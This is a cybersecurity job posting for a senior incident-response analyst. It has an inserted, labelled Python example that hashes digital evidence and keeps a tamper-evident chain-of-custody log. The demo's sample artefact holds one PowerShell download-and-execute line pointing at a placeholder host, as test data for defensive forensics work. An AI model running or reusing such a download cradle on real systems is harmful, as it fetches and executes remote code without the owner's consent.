Senior Analyst, Cyber Risk Defense, Cyber Emergency Response Team

Urgent

Job Description

The Kaiser Cyber Emergency Response Team (KCERT) uses incident response, investigative, and forensics skills (endpoint, network, SIEM, etc.) to scope, triage, and determine the extent of a potential security breach, the containment measures required, and the overall response needed. This includes appropriate data collection, preservation, mitigation, remediation requirements, reporting, and security improvement plans. The Incident Handler follows incident response playbooks and also makes tactical decisions based on industry standards and best practices throughout the response lifecycle for internal and/or external threats. Where speed or evidence-handling requirements demand it, the responder may need to maintain and provide chain of custody for criminal investigations (e.g., employee situations, fraud, etc.).

Essential Responsibilities

• Evaluate alerts, evidence, and indicators from all relevant sources (network, endpoint, SIEM, local logs, etc.) to triage, scope, and evaluate threats.

• Perform cyber defense incident triage, including determining scope, urgency, and potential impact, identifying the specific vulnerability exploited, and implementing rapid containment controls.

• Collect and preserve digital evidence in a manner appropriate to the threat (up to and including a forensically sound manner according to best practices).

• Evaluate artifacts (processes, services, drivers, libraries, binaries, scripts, memory, network traffic, files, email, and other objects) for malicious activity, exploitation, and/or unauthorized access.

• Identify attack vectors, exploit methods, malicious code, C2 activity, and persistence mechanisms.

• Perform analysis to determine the full scope, risk, and impact of a breach or exposure.

• Perform root cause analysis and recommend mitigation strategies.

• Properly and thoroughly document incident findings, evidence, and analysis steps, and create status updates, findings reports, and recommendations.

• Focus on preserving uptime and minimizing the impact on business and medical services.

• Collaborate with other teams to perform real-time cyber defense incident handling tasks (e.g., forensic collections, intrusion correlation and tracking, threat analysis, and direct system remediation).

• Employ approved defense-in-depth principles and practices (e.g., defense in multiple places, layered defenses, security robustness).

• Collect and analyze intrusion artifacts (e.g., source code, malware, Trojans) and use discovered data to enable mitigation of potential cyber defense incidents within the enterprise.

• Coordinate with intelligence analysts to correlate threat assessment data.

• Write, publish, and socialize after-action reports and presentations.

• Determine the extent of threats and recommend mitigation and/or remediation courses of action or countermeasures to manage risks.
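The evidence-preservation and chain-of-custody responsibilities above come down to two mechanics in practice: hash the artefact at the moment of acquisition, and keep a custody record that later handlers cannot silently edit. The following is an added example (not code from the job posting or from KCERT) showing both in Python: a chunked SHA-256 of the collected file, a write-protected copy in an evidence store, and an append-only JSON-lines custody log in which each entry carries the hash of the previous line, so a deleted or altered record breaks the chain. The case ID, handler names, and the sample PowerShell artefact are constructed for the demo.

```python
"""Evidence hashing and chain-of-custody log (added example, not from the posting).

Case IDs, handler names and the sample artefact are constructed for the demo.
"""
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone
from pathlib import Path

GENESIS = "0" * 64  # prev-hash value carried by the first custody entry


def sha256_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Hash in chunks so disk or memory images need not fit in RAM."""
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


class CustodyLog:
    """Append-only JSON-lines log; each entry carries the hash of the previous line."""

    def __init__(self, log_path: Path):
        self.log_path = log_path

    def _lines(self):
        if not self.log_path.exists():
            return []
        return [ln for ln in self.log_path.read_bytes().splitlines() if ln]

    def record(self, case_id, evidence_id, action, handler, evidence_hash, note=""):
        lines = self._lines()
        entry = {
            "case_id": case_id, "evidence_id": evidence_id, "handler": handler,
            "action": action,  # acquired / transferred / verified / analysed
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "sha256": evidence_hash, "note": note,
            "prev_entry_sha256": hashlib.sha256(lines[-1]).hexdigest() if lines else GENESIS,
        }
        with self.log_path.open("ab") as fh:
            fh.write(json.dumps(entry, sort_keys=True).encode() + b"\n")
        return entry

    def entries(self):
        return [json.loads(ln) for ln in self._lines()]

    def chain_intact(self) -> bool:
        """A deleted or edited log line breaks the hash chain at the next entry."""
        prev = GENESIS
        for raw in self._lines():
            if json.loads(raw)["prev_entry_sha256"] != prev:
                return False
            prev = hashlib.sha256(raw).hexdigest()
        return True


def acquire(source: Path, store: Path, log: CustodyLog, case_id, evidence_id, handler):
    """Copy the artefact into the evidence store, prove the copy matches, log it."""
    store.mkdir(parents=True, exist_ok=True)
    dest = store / f"{evidence_id}.bin"
    dest.write_bytes(source.read_bytes())
    src_hash, dst_hash = sha256_file(source), sha256_file(dest)
    if src_hash != dst_hash:
        raise RuntimeError("evidence copy does not match source; acquisition failed")
    os.chmod(dest, 0o440)  # read-only in the store to prevent accidental modification
    log.record(case_id, evidence_id, "acquired", handler, dst_hash, note=f"from {source}")
    return dest, dst_hash


def verify(dest: Path, log: CustodyLog, case_id, evidence_id, handler) -> bool:
    """Re-hash before every transfer or analysis step; a mismatch is an integrity failure."""
    original = next(e["sha256"] for e in log.entries()
                    if e["evidence_id"] == evidence_id and e["action"] == "acquired")
    current = sha256_file(dest)
    ok = current == original
    log.record(case_id, evidence_id, "verified", handler, current,
               note="match" if ok else "MISMATCH: integrity failure")
    return ok


def demo() -> dict:
    """Constructed walkthrough: acquire, verify, simulate tampering, verify again."""
    work = Path(tempfile.mkdtemp())
    src = work / "suspicious.ps1"  # constructed sample artefact, not real malware
    src.write_bytes(b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\n")
    log = CustodyLog(work / "custody.jsonl")
    dest, acquired = acquire(src, work / "evidence", log, "CASE-0001", "EV-01", "analyst.a")
    first = verify(dest, log, "CASE-0001", "EV-01", "analyst.b")
    os.chmod(dest, 0o640)
    dest.write_bytes(b"Write-Host 'benign'\n")  # someone alters the stored copy
    second = verify(dest, log, "CASE-0001", "EV-01", "analyst.b")
    return {"acquired_sha256": acquired, "first_verify": first, "after_tamper": second,
            "log_entries": len(log.entries()), "chain_intact": log.chain_intact()}
```

The mismatch is recorded in the log rather than hidden, because a failed verification is itself custody history: the report must show when the item was last known good and who handled it since. In real collections the source is usually read through a write blocker or from an image, and the custody log itself would be signed or copied off-host, since the hash chain only detects tampering, it does not prevent it.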

Minimum Qualifications

• Bachelor's degree or higher in a cybersecurity-, IT-, or business-related field.

• KCERT Senior Analyst: 5 years of experience.

• Knowledge of computer networking concepts and protocols, and network security methodologies.

• Knowledge of cyber threats and vulnerabilities.

• Knowledge of specific operational impacts of cybersecurity lapses.

• Knowledge of incident response and handling methodologies.

• Knowledge of intrusion detection methodologies and techniques for detecting host- and network-based intrusions.

• Knowledge of what constitutes a network attack and a network attack's relationship to both threats and vulnerabilities.

• Knowledge of cyber attack stages (e.g., reconnaissance, scanning, enumeration, gaining access, escalation of privileges, maintaining access, network exploitation, covering tracks).

• Knowledge of adversarial tactics, techniques, and procedures.

Additional Requirements

• Broad knowledge of digital processing platforms, hardware, operating systems, and applications, and the ability to identify, troubleshoot, and triage failures in any of these areas.

• A strong understanding of malware and attacker techniques.

• Ability to perform deep-dive analysis to determine the root cause and full impact of incidents.

• Knowledge of and experience with security controls including EDR, forensics tools, intrusion prevention, authentication mechanisms, data collection and analysis tools, and Splunk SIEM.

• Excellent communication and documentation skills.

• Avoid unnecessary production impact from investigation activities wherever possible.

• Properly manage elevated access within the environment.

• Ability to work in a team of professionals sharing workload and investigation assignments in a fast-paced, high-risk environment.

• Ability to produce reports for senior-level management that properly articulate risk, exposure, and corrective action plans.

• Ability to lead diverse teams of SMEs and Operations Management through a security incident.

• Ability to respond quickly and accurately to any level of security incident.

• Expert knowledge of Windows-based operating systems.

• Working knowledge of Linux/UNIX-based operating systems.

• Proficient in shell scripting and in multiple modern scripting languages.

• Experience with multiple forensics platforms, such as EnCase, FTK, X-Ways, etc.

• A strong understanding of networking and the ability to decode and analyze traffic.

• Expert knowledge of security controls and technologies at all layers.

• Strong self-starting ability, patience, and leadership skills.

• Effective communication skills and the ability to translate cyber security threats from a technical perspective into business-level understanding and execution.

• Strong analytical and problem-solving skills and the ability to work with a diverse array of teams.

• Broad technical background involving cyber security, computer forensics, network forensics, log forensics, incident response, and/or incident management.

• A thorough understanding of attacker/malware tools, tactics, and procedures.

• Training, mentoring, leadership, and project management skills.

Licenses and Certifications

EnCE, GCFE, GCFA, GNFA, GDAT, GCIH, GREM, GLEG, GDSA, GCCC, CISA, CISM, and/or similar certifications

Benefits

• Transportation.

• Life insurance.

• Medical insurance.

• Solidarity association.

• Growth plans.

• Additional days off.

K4